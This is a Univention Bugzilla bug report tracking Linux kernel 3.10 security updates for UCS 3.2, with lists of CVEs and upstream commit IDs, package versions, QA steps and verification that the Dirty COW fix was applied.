Univention Bugzilla – Bug 41314
linux: Multiple security issues (3.2)
Last modified: 2016-10-26 17:34:36 CEST
Upstream v3.10.101 fixes several issues with respect to v3.10.96 (Bug #39209): CVE-2015-7566 CVE-2015-7990 CVE-2015-8785 CVE-2015-8812 CVE-2016-0723 CVE-2016-2384 CVE-2016-2550 CVE-2016-2782 CVE-2016-partial-SMAP-bypass I identified these from the git commit IDs.
Upstream v3.10.102 fixes several issues with respect to v3.10.101 CVE-2016-4580: 79e48650320e6fba48369fccf13fd045315b19b8 CVE-2016-4486: 5f8e44741f9f216e33736ea4ec65ca9ac03036e6 CVE-2016-4485: b8670c09f37bdf2847cc44f36511a53afc6161fd CVE-2016-2117: f43bfaeddc79effbf3d0fcb53ca477cca66f3db8 CVE-2016-4913: 99d825822eade8d827a1817357cbf3f889a552d6 CVE-2016-0821: 8a5e5e02fc83aaf67053ab53b359af08c6c49aaf CVE-2016-3955: b348d7dddb6c4fbfc810b7a0626e8ec9e29f7cbb CVE-2016-2187: 162f98dea487206d9ab79fc12ed64700667a894d CVE-2015-7833: fa52bd506f274b7619955917abfde355e3d19ffe CVE-2016-4805: 1f461dcdd296eecedaffffc6bae2bfa90bd7eb89 CVE-2016-3951: 1666984c8625b3db19a9abc298931d35ab7bc64b CVE-2016-2185: 950336ba3e4a1ffd2ca60d29f6ef386dd2c7351d CVE-2016-3689: a0ad220c96692eda76b2e3fd7279f3dcd1d8a8ff CVE-2016-2186: 9c6ba456711687b794dcf285856fc14e2c76074f CVE-2016-3137: c55aee1bf0e6b6feec8b2927b43f7a09a6d5f754 CVE-2016-3140: 5a07975ad0a36708c6b0a5b9fea1ff811d0b0c1f CVE-2016-3136: 4e9a0b05257f29cf4b75f3209243ed71614d062e CVE-2016-2188: 4ec0ef3a82125efc36173062a50624550a900ae0 CVE-2016-3138: 8835ba4a39cf53f705417b3b3a94eb067673f2c9 CVE-2016-3157: b7a584598aea7ca73140cb87b40319944dd3393f I identified these from the git commit IDs above.
I guess we should also pick up the forthcoming yet unreleased tcp-make-challenge-acks-less-predictable.patch from https://anonscm.debian.org/cgit/kernel/linux.git/commit/?h=wheezy-security&id=f383788fb866fc61daf26836bccd92ebf7a6f02f (the patch applies cleanly). While it may not be that critical, and there is a workaround via sysctl.conf, it enjoys a certain publicity currently and customers will inquire.
New issues, currently only fixed in Debian sid (currently at Kernel 4.7): * Race condition in the audit_log_single_execve_arg function in kernel/auditsc.c in the Linux kernel through 4.7 allows local users to bypass intended character-set restrictions or disrupt system-call auditing by changing a certain string, aka a "double fetch" vulnerability. (CVE-2016-6136) * Race condition in the ioctl_send_fib function in drivers/scsi/aacraid/commctrl.c in the Linux kernel through 4.7 allows local users to cause a denial of service (out-of-bounds access or system crash) by changing a certain size value, aka a "double fetch" vulnerability. (CVE-2016-6480) * Linux tcp_xmit_retransmit_queue use after free (CVE-2016-6828)
CVE-2016-6136: 43761473c254b45883a64441dd0bc85a42f3645c CVE-2016-6480: fa00c437eef8dc2e7b25f8cd868cfa405fcc2bb3 CVE-2016-6828: bb1fceca22492109be12640d49f5ea5a544c6bb4 bd131fb1aa5e4cd879f89aef30f4f7cde6d4b409 audit: Kill the unused struct audit_aux_data_capset 9462dc59817580419ef1f2504e32f861c290f251 audit: remove unused envc member of audit_aux_data_execve d9cfea91e97d5d19f9d69beaa844f5fe56a6adc6 audit: move audit_aux_data_execve contents into audit_context union 9410d228a4cf434305306746bb799fb7acdd8648 audit: call audit_bprm() only once to add AUDIT_EXECVE information b7550787fe8b5beffb5f56fa11a87712d699d085 audit: remove stray newline from audit_log_execve_info() audit_panic() call a49b282f08d96cd73838e4e1a5ace747d432ba7d audit: Fix check of return value of strnlen_user() a4664afa0dffd5340c61511d3da14e30bfd01517 Fix broken audit tests for exec arg len 634a3fc5f16470e9b78ccd7ce643305122d5ebb2 audit: fix a double fetch in audit_log_single_execve_arg() r16767
r16768 Package: linux Version: 3.10.103-1.203.201610051715 Branch: ucs_3.2-0 Scope: errata3.2-8 r72952 | Bug #41314: Copyright 2016 r72951 | Bug #41314: Update to linux-3.10.103 Package: univention-kernel-image Version: 7.0.0-24.107.201610060920 Branch: ucs_3.2-0 Scope: errata3.2-8 r72960 | Bug #41314: linux-3.10.103 YAML linux.yaml univention-kernel-image.yaml QA: uname -r # 3.10.0-ucs203-686-pae QA: uname -r # 3.10.0-ucs203-amd64 QA: diff dmesg QA: zless /usr/share/doc/linux-image-3.10.0-ucs203-686-pae/changelog.Debian.gz
There are a couple of new issues reported for the Linux Kernel: * The rfcomm_sock_bind function in net/bluetooth/rfcomm/sock.c in the Linux kernel before 4.2 allows local users to obtain sensitive information or cause a denial of service (NULL pointer dereference) via vectors involving a bind system call on a Bluetooth RFCOMM socket. (CVE-2015-8956) * privilege escalation via MAP_PRIVATE COW breakage (CVE-2016-5195) * The proc_keys_show function in security/keys/proc.c in the Linux kernel through 4.8.2, when the GNU Compiler Collection (gcc) stack protector is enabled, uses an incorrect buffer size for certain timeout data, which allows local users to cause a denial of service (stack memory corruption and panic) by reading the /proc/keys file. (CVE-2016-7042) * The arcmsr_iop_message_xfer function in drivers/scsi/arcmsr/arcmsr_hba.c in the Linux kernel through 4.8.2 does not restrict a certain length field, which allows local users to gain privileges or cause a denial of service (heap-based buffer overflow) via an ARCMSR_MESSAGE_WRITE_WQBUFFER control code. (CVE-2016-7425) Of those upstream v3.10.104 fixes only http://dirtycow.ninja/ (CVE-2016-5195): mm: remove gup_flags FOLL_WRITE games from __get_user_pages() commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 upstream We should pick that up with this erratum.
Package: linux Version: 3.10.104-0.1.208.201610250906 Version: 3.10.104-0.1.209.201610250949 Version: 3.10.104-0.1.210.201610251001 Branch: ucs_3.2-0 Scope: errata3.2-8 Package: univention-kernel-image Version: 7.0.0-25.114.201610251616 Branch: ucs_3.2-0 Scope: errata3.2-8 r73581 | Bug #41314: Update to 3.10.104 YAML
Verified: * Upstream sources have been imported and UCS patches refreshed * Imported sources match upstream v3.10.104 tag including the patch for CVE-2016-5195 * Existing Univention source patches have been merged into the new Debian source package * New security patches merged into source package match upstream code * The source version contains now "-0.1" instead of "-1" but that's ok: 3.10.104-0.1.210.201610251001 * Package update and reboot Ok * PoC exploit rendered ineffective * Advisory Ok
<http://errata.software-univention.de/ucs/3.2/450.html> <http://errata.software-univention.de/ucs/3.2/451.html>